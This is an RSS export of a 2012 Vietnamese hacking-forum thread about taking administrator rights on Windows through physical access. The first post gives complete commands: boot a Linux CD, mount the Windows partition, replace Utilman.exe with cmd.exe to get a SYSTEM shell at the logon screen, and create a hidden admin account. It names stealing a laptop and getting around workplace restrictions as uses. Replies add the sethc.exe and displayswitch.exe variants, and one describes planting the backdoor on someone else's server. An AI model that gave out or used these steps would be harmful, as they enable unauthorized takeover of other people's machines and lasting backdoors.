<?xml version="1.0" encoding="UTF-8"?>
<rss version="2.0">
	<channel>
		<title><![CDATA[Latest posts for the topic "Một cách lấy quyền admin của Windows khi có physical access"]]></title>
		<link>http://www.hvaonline.net/hvaonline/posts/list/23.hva</link>
		<description><![CDATA[Latest messages posted in the topic "Một cách lấy quyền admin của Windows khi có physical access"]]></description>
		<generator>JForum - http://www.jforum.net</generator>
			<item>
				<title>Một cách lấy quyền admin của Windows khi có physical access</title>
				<description><![CDATA[ Xin chia sẻ với anh em một cách đơn giản lấy quyền admin của Window. Sử dụng trong các trường hợp:
1) quên password
2) nơi làm việc không cho quyền admin
3) ăn trộm được con máy tính và không muốn format máy
..
2 + 3 thì không khuyến khích :P
Nói chung là bất cứ khi nào mó máy được đến máy tính (và không ai để ý) là ta có thể chơi được trò này.

Dĩ nhiên có rất nhiều cách khác, nhưng đây là cách mình cho là đơn giản và nhanh gọn. Anh em nào biết cách hay hơn cũng xin chia sẻ trong topic này.

Thực hiện lần lượt các bước sau:

1) Burn 1 cái CD linux phiên bản bất kỳ
2) Boot bằng CD này, không cần cài, chỉ cần chạy được shell
3) Chạy những command sau lần lượt:
<span class="quotetxt"><b>Code:</b></span><br/>
		<div class="coded"">
		<pre>fdisk -l</pre>
		</div>
để ý dòng nào có cái NTFS (FAT32), và copy cái /dev/xxx. ví dụ
<span class="quotetxt"><b>Code:</b></span><br/>
		<div class="coded"">
		<pre>/dev/sda2              13       64408   517250914    7  HPFS/NTFS</pre>
		</div>
mount cái dev này vào folder chơi
<span class="quotetxt"><b>Code:</b></span><br/>
		<div class="coded"">
		<pre>mkdir /mnt/sda2
mount -t ntfs /dev/sda2 /mnt/sda2/</pre>
		</div>

bây giờ đến đoạn tricky, ta sử dụng con "backdoor" cho sẵn của window. <span class="link"> http://www.file.net/process/utilman.exe.html</span>)

<span class="quotetxt"><b>Code:</b></span><br/>
		<div class="coded"">
		<pre>cd /mnt/sda2/Windows/System32/
mv Utilman.exe Utilman.exe.bak
cp cmd.exe Utilman.exe</pre>
		</div>

Xong, bây giờ reboot lại vào Window, Nhấn tổ hợp [Window-Key] + U

Bảng cmd.exe chạy dưới quyền SYSTEM sẽ hiện lên. Việc còn lại chỉ là tạo 1 user admin:
<span class="quotetxt"><b>Code:</b></span><br/>
		<div class="coded"">
		<pre>net user foo passf00 /add
net localgroup Administrator foo /add</pre>
		</div>

Sau đó tắt cmd đi vào login vào bằng foo/passf00

Chúc thành công

Tested : Window 7
Nguồn: sưu tầm  :D 





]]></description>
				<guid isPermaLink="true">http://www.hvaonline.net/hvaonline/posts/list/41088.hva#252988</guid>
				<link>http://www.hvaonline.net/hvaonline/posts/list/41088.hva#252988</link>
				<pubDate><![CDATA[Tue, 31 Jan 2012 03:57:53]]> GMT</pubDate>
				<author><![CDATA[ WinDak]]></author>
			</item>
			<item>
				<title>Một cách lấy quyền admin của Windows khi có physical access</title>
				<description><![CDATA[ Hi thanks anh,

Cách này em thấy thông thường dùng để reset mật khẩu Windows server 2008, có một bài viết cũng tương tự:

http://thanhcuong.wordpress.com/2010/11/23/cach-reset-password-windows-server-2008-khi-l%E1%BB%A1-quen-password/]]></description>
				<guid isPermaLink="true">http://www.hvaonline.net/hvaonline/posts/list/41088.hva#252992</guid>
				<link>http://www.hvaonline.net/hvaonline/posts/list/41088.hva#252992</link>
				<pubDate><![CDATA[Tue, 31 Jan 2012 07:13:59]]> GMT</pubDate>
				<author><![CDATA[ tanviet12]]></author>
			</item>
			<item>
				<title>Một cách lấy quyền admin của Windows khi có physical access</title>
				<description><![CDATA[ Cách này giống ngày xưa mình làm trên thằng Windows XP thì đổi file sethc.exe là file của chương trình stickykey bằng file cmd.exe . Sau khi bấm 5 lần phím Shift thì cmd.exe hiện ra dù đang ở màn hình logon :-)]]></description>
				<guid isPermaLink="true">http://www.hvaonline.net/hvaonline/posts/list/41088.hva#252996</guid>
				<link>http://www.hvaonline.net/hvaonline/posts/list/41088.hva#252996</link>
				<pubDate><![CDATA[Tue, 31 Jan 2012 09:05:22]]> GMT</pubDate>
				<author><![CDATA[ xnohat]]></author>
			</item>
			<item>
				<title>Một cách lấy quyền admin của Windows khi có physical access</title>
				<description><![CDATA[ <p></p>
		<cite class="blockquote">xnohat wrote:</cite><br>
		<blockquote>Cách này giống ngày xưa mình làm trên thằng Windows XP thì đổi file sethc.exe là file của chương trình stickykey bằng file cmd.exe . Sau khi bấm 5 lần phím Shift thì cmd.exe hiện ra dù đang ở màn hình logon :-)&nbsp;
		</blockquote>
bên xp thì dùng được, không biết bên win7 còn dùng được không nhỉ?]]></description>
				<guid isPermaLink="true">http://www.hvaonline.net/hvaonline/posts/list/41088.hva#252997</guid>
				<link>http://www.hvaonline.net/hvaonline/posts/list/41088.hva#252997</link>
				<pubDate><![CDATA[Tue, 31 Jan 2012 09:43:11]]> GMT</pubDate>
				<author><![CDATA[ maitan_10000]]></author>
			</item>
			<item>
				<title>Một cách lấy quyền admin của Windows khi có physical access</title>
				<description><![CDATA[ <p></p>
		<cite class="blockquote">maitan_10000 wrote:</cite><br>
		<blockquote><p></p>
		<cite class="blockquote">xnohat wrote:</cite><br>
		<blockquote>Cách này giống ngày xưa mình làm trên thằng Windows XP thì đổi file sethc.exe là file của chương trình stickykey bằng file cmd.exe . Sau khi bấm 5 lần phím Shift thì cmd.exe hiện ra dù đang ở màn hình logon :-)&nbsp;
		</blockquote>
bên xp thì dùng được, không biết bên win7 còn dùng được không nhỉ?&nbsp;
		</blockquote>

Win7 cũng làm được đấy :D Windows/System32/sethc.exe
Ngoài ra trong win7 còn có thằng displayswitch.exe :)) . Lắm "backdoor" quá ]]></description>
				<guid isPermaLink="true">http://www.hvaonline.net/hvaonline/posts/list/41088.hva#253000</guid>
				<link>http://www.hvaonline.net/hvaonline/posts/list/41088.hva#253000</link>
				<pubDate><![CDATA[Tue, 31 Jan 2012 10:46:19]]> GMT</pubDate>
				<author><![CDATA[ WinDak]]></author>
			</item>
			<item>
				<title>Một cách lấy quyền admin của Windows khi có physical access</title>
				<description><![CDATA[ <p></p>
		<cite class="blockquote">WinDak wrote:</cite><br>
		<blockquote><p></p>
		<cite class="blockquote">maitan_10000 wrote:</cite><br>
		<blockquote><p></p>
		<cite class="blockquote">xnohat wrote:</cite><br>
		<blockquote>Cách này giống ngày xưa mình làm trên thằng Windows XP thì đổi file sethc.exe là file của chương trình stickykey bằng file cmd.exe . Sau khi bấm 5 lần phím Shift thì cmd.exe hiện ra dù đang ở màn hình logon :-)&nbsp;
		</blockquote>
bên xp thì dùng được, không biết bên win7 còn dùng được không nhỉ?&nbsp;
		</blockquote>

Win7 cũng làm được đấy :D Windows/System32/sethc.exe
Ngoài ra trong win7 còn có thằng displayswitch.exe :)) . Lắm &quot;backdoor&quot; quá &nbsp;
		</blockquote>

Win7 không ghi đè kiểu thông thường được anh ạ. còn cách sethc.exe thì 1 số cu cậu còn làm backdoor trên cả server của người ta =)). thằng admin server cứ há mồm tìm backdoor (dùng diệt virus quét thật lực) nhưng mấy hôm sau lại thấy user administrator khác được tạo thêm. cuối cùng sau 3 ngày liền ngồi rình thì tóm được 1 cái ComputerName remote vào -&gt; google ra tên thằng Hack =((.]]></description>
				<guid isPermaLink="true">http://www.hvaonline.net/hvaonline/posts/list/41088.hva#253002</guid>
				<link>http://www.hvaonline.net/hvaonline/posts/list/41088.hva#253002</link>
				<pubDate><![CDATA[Tue, 31 Jan 2012 11:27:53]]> GMT</pubDate>
				<author><![CDATA[ phanledaivuong]]></author>
			</item>
			<item>
				<title>Một cách lấy quyền admin của Windows khi có physical access</title>
				<description><![CDATA[ <p></p>
		<cite class="blockquote">phanledaivuong wrote:</cite><br>
		<blockquote>
Win7 không ghi đè kiểu thông thường được anh ạ. còn cách sethc.exe thì 1 số cu cậu còn làm backdoor trên cả server của người ta =)). thằng admin server cứ há mồm tìm backdoor (dùng diệt virus quét thật lực) nhưng mấy hôm sau lại thấy user administrator khác được tạo thêm. cuối cùng sau 3 ngày liền ngồi rình thì tóm được 1 cái ComputerName remote vào -&gt; google ra tên thằng Hack =((.&nbsp;
		</blockquote>

Đúng là trong Windows thì những file  hệ thống thường có "Windows File Protection" bảo vệ nên không thể chép đè lên chúng TRONG WINDOWS dù có quyền admin đi chăng nữa. Có lẽ phải patch một số file khác để làm việc đó (như thế nào tớ cũng không rõ). 

Cho nên cách tớ và các anh em trên đang thảo luận chỉ làm việc khi boot vào 1 HDH khác, khi đó file system của Window không có gì bảo vệ.

nói nhỏ: đã test thành công với thằng máy Windows 7 ở chỗ mình làm việc :P.

Anh em nào giỏi "cracking" có khi còn có thể patch một vài file khi khởi động của Windows để cho đăng nhập với bất kì password nào chẳng hạn.

]]></description>
				<guid isPermaLink="true">http://www.hvaonline.net/hvaonline/posts/list/41088.hva#253012</guid>
				<link>http://www.hvaonline.net/hvaonline/posts/list/41088.hva#253012</link>
				<pubDate><![CDATA[Wed, 1 Feb 2012 03:13:36]]> GMT</pubDate>
				<author><![CDATA[ WinDak]]></author>
			</item>
			<item>
				<title>Một cách lấy quyền admin của Windows khi có physical access</title>
				<description><![CDATA[ <p></p>
		<cite class="blockquote">WinDak wrote:</cite><br>
		<blockquote><p></p>
		<cite class="blockquote">phanledaivuong wrote:</cite><br>
		<blockquote>
Win7 không ghi đè kiểu thông thường được anh ạ. còn cách sethc.exe thì 1 số cu cậu còn làm backdoor trên cả server của người ta =)). thằng admin server cứ há mồm tìm backdoor (dùng diệt virus quét thật lực) nhưng mấy hôm sau lại thấy user administrator khác được tạo thêm. cuối cùng sau 3 ngày liền ngồi rình thì tóm được 1 cái ComputerName remote vào -&gt; google ra tên thằng Hack =((.&nbsp;
		</blockquote>

Đúng là trong Windows thì những file  hệ thống thường có "Windows File Protection" bảo vệ nên không thể chép đè lên chúng TRONG WINDOWS dù có quyền admin đi chăng nữa. Có lẽ phải patch một số file khác để làm việc đó (như thế nào tớ cũng không rõ). 

Cho nên cách tớ và các anh em trên đang thảo luận chỉ làm việc khi boot vào 1 HDH khác, khi đó file system của Window không có gì bảo vệ.

nói nhỏ: đã test thành công với thằng máy Windows 7 ở chỗ mình làm việc :P.

Anh em nào giỏi "cracking" có khi còn có thể patch một vài file khi khởi động của Windows để cho đăng nhập với bất kì password nào chẳng hạn.

&nbsp;
		</blockquote>

trước đây mình có thử chép đè bằng Ubuntu. tuy nhiên khi khởi động vào Windows 7 thì bị báo lỗi nên phải sửa lại như cũ. chắc là để hôm nào mình thử lại.]]></description>
				<guid isPermaLink="true">http://www.hvaonline.net/hvaonline/posts/list/41088.hva#253016</guid>
				<link>http://www.hvaonline.net/hvaonline/posts/list/41088.hva#253016</link>
				<pubDate><![CDATA[Wed, 1 Feb 2012 05:28:25]]> GMT</pubDate>
				<author><![CDATA[ phanledaivuong]]></author>
			</item>
			<item>
				<title>Một cách lấy quyền admin của Windows khi có physical access</title>
				<description><![CDATA[ Mình sẽ dùng disk boot là nhanh nhất :D
]]></description>
				<guid isPermaLink="true">http://www.hvaonline.net/hvaonline/posts/list/41088.hva#253497</guid>
				<link>http://www.hvaonline.net/hvaonline/posts/list/41088.hva#253497</link>
				<pubDate><![CDATA[Sat, 11 Feb 2012 01:32:28]]> GMT</pubDate>
				<author><![CDATA[ __mask]]></author>
			</item>
			<item>
				<title>Một cách lấy quyền admin của Windows khi có physical access</title>
				<description><![CDATA[ <p></p>
		<cite class="blockquote">WinDak wrote:</cite><br>
		<blockquote><p></p>
		<cite class="blockquote">phanledaivuong wrote:</cite><br>
		<blockquote>
Win7 không ghi đè kiểu thông thường được anh ạ. còn cách sethc.exe thì 1 số cu cậu còn làm backdoor trên cả server của người ta =)). thằng admin server cứ há mồm tìm backdoor (dùng diệt virus quét thật lực) nhưng mấy hôm sau lại thấy user administrator khác được tạo thêm. cuối cùng sau 3 ngày liền ngồi rình thì tóm được 1 cái ComputerName remote vào -&gt; google ra tên thằng Hack =((.&nbsp;
		</blockquote>

Đúng là trong Windows thì những file  hệ thống thường có "<font color='red'>Windows File Protection</font>" bảo vệ nên không thể chép đè lên chúng TRONG WINDOWS dù có quyền admin đi chăng nữa. Có lẽ phải patch một số file khác để làm việc đó (như thế nào tớ cũng không rõ). 

Cho nên cách tớ và các anh em trên đang thảo luận chỉ làm việc khi boot vào 1 HDH khác, khi đó file system của Window không có gì bảo vệ.

nói nhỏ: đã test thành công với thằng máy Windows 7 ở chỗ mình làm việc :P.

Anh em nào giỏi "cracking" có khi còn có thể patch một vài file khi khởi động của Windows để cho đăng nhập với bất kì password nào chẳng hạn.

&nbsp;
		</blockquote>

Cái này thì dùng tool có sẵn của Windows giải quyết :) 
Trong cmd gõ lệnh <font color='orange'>takeown /?</font> để biết thêm chi tiết  :D ]]></description>
				<guid isPermaLink="true">http://www.hvaonline.net/hvaonline/posts/list/41088.hva#253589</guid>
				<link>http://www.hvaonline.net/hvaonline/posts/list/41088.hva#253589</link>
				<pubDate><![CDATA[Mon, 13 Feb 2012 19:17:23]]> GMT</pubDate>
				<author><![CDATA[ .lht.]]></author>
			</item>
			<item>
				<title>Một cách lấy quyền admin của Windows khi có physical access</title>
				<description><![CDATA[ Mấy bồ coi thử cái này ..
http://www.piotrbania.com/all/kon-boot/]]></description>
				<guid isPermaLink="true">http://www.hvaonline.net/hvaonline/posts/list/41088.hva#254492</guid>
				<link>http://www.hvaonline.net/hvaonline/posts/list/41088.hva#254492</link>
				<pubDate><![CDATA[Sun, 19 Feb 2012 03:53:13]]> GMT</pubDate>
				<author><![CDATA[ kentmt]]></author>
			</item>
			<item>
				<title>Một cách lấy quyền admin của Windows khi có physical access</title>
				<description><![CDATA[ Hiren's Boot là nhanh và hiệu quả nhất :D]]></description>
				<guid isPermaLink="true">http://www.hvaonline.net/hvaonline/posts/list/41088.hva#254764</guid>
				<link>http://www.hvaonline.net/hvaonline/posts/list/41088.hva#254764</link>
				<pubDate><![CDATA[Tue, 21 Feb 2012 03:48:15]]> GMT</pubDate>
				<author><![CDATA[ imphch]]></author>
			</item>
			<item>
				<title>Một cách lấy quyền admin của Windows khi có physical access</title>
				<description><![CDATA[ Co anh nao biet su khac nhau giua windowns 7 32bit va windowns 7 64bit ko?chi cho minh di.minh lang thang tren mang thi thay ho noi giong nhau qua va cha chi tiet chut nao het]]></description>
				<guid isPermaLink="true">http://www.hvaonline.net/hvaonline/posts/list/41088.hva#256719</guid>
				<link>http://www.hvaonline.net/hvaonline/posts/list/41088.hva#256719</link>
				<pubDate><![CDATA[Fri, 2 Mar 2012 22:52:18]]> GMT</pubDate>
				<author><![CDATA[ golemdragon]]></author>
			</item>
			<item>
				<title>Một cách lấy quyền admin của Windows khi có physical access</title>
				<description><![CDATA[ <p></p>
		<cite class="blockquote">.lht. wrote:</cite><br>
		<blockquote><p></p>
		<cite class="blockquote">WinDak wrote:</cite><br>
		<blockquote><p></p>
		<cite class="blockquote">phanledaivuong wrote:</cite><br>
		<blockquote>
Win7 không ghi đè kiểu thông thường được anh ạ. còn cách sethc.exe thì 1 số cu cậu còn làm backdoor trên cả server của người ta =)). thằng admin server cứ há mồm tìm backdoor (dùng diệt virus quét thật lực) nhưng mấy hôm sau lại thấy user administrator khác được tạo thêm. cuối cùng sau 3 ngày liền ngồi rình thì tóm được 1 cái ComputerName remote vào -&gt; google ra tên thằng Hack =((.&nbsp;
		</blockquote>

Đúng là trong Windows thì những file  hệ thống thường có "<font color='red'>Windows File Protection</font>" bảo vệ nên không thể chép đè lên chúng TRONG WINDOWS dù có quyền admin đi chăng nữa. Có lẽ phải patch một số file khác để làm việc đó (như thế nào tớ cũng không rõ). 

Cho nên cách tớ và các anh em trên đang thảo luận chỉ làm việc khi boot vào 1 HDH khác, khi đó file system của Window không có gì bảo vệ.

nói nhỏ: đã test thành công với thằng máy Windows 7 ở chỗ mình làm việc :P.

Anh em nào giỏi "cracking" có khi còn có thể patch một vài file khi khởi động của Windows để cho đăng nhập với bất kì password nào chẳng hạn.

&nbsp;
		</blockquote>

Cái này thì dùng tool có sẵn của Windows giải quyết :) 
Trong cmd gõ lệnh <font color='orange'>takeown /?</font> để biết thêm chi tiết  :D &nbsp;
		</blockquote>

take ownership chỉ dùng khi đã logon vào system rồi, còn chưa login thì ... botay]]></description>
				<guid isPermaLink="true">http://www.hvaonline.net/hvaonline/posts/list/41088.hva#256790</guid>
				<link>http://www.hvaonline.net/hvaonline/posts/list/41088.hva#256790</link>
				<pubDate><![CDATA[Sat, 3 Mar 2012 15:10:05]]> GMT</pubDate>
				<author><![CDATA[ TMDTHBC]]></author>
			</item>
			<item>
				<title>Một cách lấy quyền admin của Windows khi có physical access</title>
				<description><![CDATA[ <p></p>
		<cite class="blockquote">xnohat wrote:</cite><br>
		<blockquote>Cách này giống ngày xưa mình làm trên thằng Windows XP thì đổi file sethc.exe là file của chương trình stickykey bằng file cmd.exe . Sau khi bấm 5 lần phím Shift thì cmd.exe hiện ra dù đang ở màn hình logon :-)&nbsp;
		</blockquote>

<p></p>
		<cite class="blockquote">WinDak wrote:</cite><br>
		<blockquote><p></p>
		<cite class="blockquote">maitan_10000 wrote:</cite><br>
		<blockquote><p></p>
		<cite class="blockquote">xnohat wrote:</cite><br>
		<blockquote>Cách này giống ngày xưa mình làm trên thằng Windows XP thì đổi file sethc.exe là file của chương trình stickykey bằng file cmd.exe . Sau khi bấm 5 lần phím Shift thì cmd.exe hiện ra dù đang ở màn hình logon :-)&nbsp;
		</blockquote>
bên xp thì dùng được, không biết bên win7 còn dùng được không nhỉ?&nbsp;
		</blockquote>

Win7 cũng làm được đấy :D Windows/System32/sethc.exe
Ngoài ra trong win7 còn có thằng displayswitch.exe :)) . Lắm "backdoor" quá &nbsp;
		</blockquote>

Với Windows XP SP3 thì các cách trên không dùng được cho limited user nữa rồi :) .]]></description>
				<guid isPermaLink="true">http://www.hvaonline.net/hvaonline/posts/list/41088.hva#262727</guid>
				<link>http://www.hvaonline.net/hvaonline/posts/list/41088.hva#262727</link>
				<pubDate><![CDATA[Tue, 8 May 2012 06:01:35]]> GMT</pubDate>
				<author><![CDATA[ bolzano_1989]]></author>
			</item>
	</channel>
</rss>
